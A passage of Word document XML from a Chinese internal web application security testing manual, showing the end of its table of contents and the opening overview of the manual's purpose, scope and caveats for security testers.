                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0FE55289" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434569" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.17.3 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>第三方应用相关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9 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>135</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6B9C065E" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434570" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.17.4 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>第三方插件相关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70 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>138</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5BAD319E" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434571" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.17.5 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>开发框架</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71 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>139</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1E5562C7" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434572" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.17.6 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>通用型系统</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72 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>143</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4CBB20BE" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D">
            <w:pPr>
              <w:pStyle w:val="12"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434573" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>三</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cstheme="minorBidi"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:noProof/>
                  <w:snapToGrid/>
                  <w:kern w:val="2"/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:tab/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>致谢</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3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3</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="41E3F88F" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D">
            <w:pPr>
              <w:pStyle w:val="12"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1470"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434574" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>附录</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>A</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cstheme="minorBidi"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:noProof/>
                  <w:snapToGrid/>
                  <w:kern w:val="2"/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:tab/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>漏洞分类依据</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4</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="61C35020" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D">
            <w:pPr>
              <w:pStyle w:val="12"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1470"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434575" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>附录</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>B</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cstheme="minorBidi"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:noProof/>
                  <w:snapToGrid/>
                  <w:kern w:val="2"/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:tab/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>名词解释</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5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4</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1CE5D516" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D">
            <w:pPr>
              <w:pStyle w:val="12"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1470"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434576" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>附录</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>C</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cstheme="minorBidi"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:noProof/>
                  <w:snapToGrid/>
                  <w:kern w:val="2"/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:tab/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>风险等级依据</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5</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0B2DAA6B" w14:textId="77777777" w:rsidR="00EC6959" w:rsidRPr="00FE1E9A" w:rsidRDefault="00EC6959" w:rsidP="002B3603">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
              </w:tabs>
              <w:ind w:firstLine="200"/>
              <w:rPr>
                <w:rStyle w:val="ad"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE1E9A">
              <w:rPr>
                <w:rStyle w:val="ad"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DBA77E4" w14:textId="77777777" w:rsidR="00EC6959" w:rsidRPr="00E970C2" w:rsidRDefault="00EC6959" w:rsidP="00E970C2">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
              </w:tabs>
              <w:spacing w:after="120" w:line="240" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rStyle w:val="ad"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:bCs/>
                <w:caps/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A1A3959" w14:textId="6E2C65D2" w:rsidR="00315164" w:rsidRDefault="00315164" w:rsidP="00315164">
      <w:pPr>
        <w:pStyle w:val="ae"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384B2419" w14:textId="77777777" w:rsidR="00315164" w:rsidRDefault="00315164">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:snapToGrid/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FD5090" w14:textId="6C1AF510" w:rsidR="008321D2" w:rsidRDefault="008321D2" w:rsidP="008321D2">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc498434465"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4E1D7495" w14:textId="17DEDDB0" w:rsidR="004B1BD5" w:rsidRPr="00D12CC0" w:rsidRDefault="004B1BD5" w:rsidP="00046217">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc498434466"/>
      <w:r w:rsidRPr="00D12CC0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="776B65C6" w14:textId="4253910E" w:rsidR="00315164" w:rsidRPr="003D5211" w:rsidRDefault="00220D7C" w:rsidP="003D5211">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5211">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合公司</w:t>
      </w:r>
      <w:r w:rsidR="00A70861" w:rsidRPr="003D5211">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5211">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部人员培养体系，本手册</w:t>
      </w:r>
      <w:r w:rsidR="007E0B3B" w:rsidRPr="003D5211">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旨在为</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5211">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全测试人员提供测试指导</w:t>
      </w:r>
      <w:r w:rsidR="007E0B3B" w:rsidRPr="003D5211">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，安全测试人员通过查阅该指南可快速掌握</w:t>
      </w:r>
      <w:r w:rsidR="007E0B3B" w:rsidRPr="003D5211">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="007E0B3B" w:rsidRPr="003D5211">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全测试，提高工作能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388FEE7F" w14:textId="2C2A187A" w:rsidR="00DA02CB" w:rsidRPr="00D12CC0" w:rsidRDefault="00DA02CB" w:rsidP="00046217">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc498434467"/>
      <w:r w:rsidRPr="00D12CC0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>适用范围</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="75D99E04" w14:textId="792B3048" w:rsidR="00DA02CB" w:rsidRPr="005A6AC6" w:rsidRDefault="000425BE" w:rsidP="005A6AC6">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A6AC6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本手册适用于</w:t>
      </w:r>
      <w:r w:rsidRPr="005A6AC6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="005A6AC6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全测试人员。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D695C18" w14:textId="65F9B8D0" w:rsidR="00DA02CB" w:rsidRPr="00D12CC0" w:rsidRDefault="00DA02CB" w:rsidP="00046217">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc498434468"/>
      <w:r w:rsidRPr="00D12CC0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意事项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="49696BDB" w14:textId="4D7F41DB" w:rsidR="00DA02CB" w:rsidRPr="005A6AC6" w:rsidRDefault="00E24317" w:rsidP="005A6AC6">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A6AC6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本手册旨在为</w:t>
      </w:r>
      <w:r w:rsidR="00A877C7" w:rsidRPr="005A6AC6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试人员提供漏洞测试的基本思路</w:t>
      </w:r>
      <w:r w:rsidRPr="005A6AC6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，随着安全技术的发展，更多新的漏洞和测试方法将被爆出，</w:t>
      </w:r>
      <w:r w:rsidR="00BA5B4F" w:rsidRPr="005A6AC6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体-简" w:hAnsi="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全测试人员应具备不断学习新知识的能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376C3447" w14:textId="77777777" w:rsidR="00D71AB4" w:rsidRPr="00B21FFF" w:rsidRDefault="00D71AB4" w:rsidP="00046217">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc498434469"/>
      <w:r w:rsidRPr="00B21FFF">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
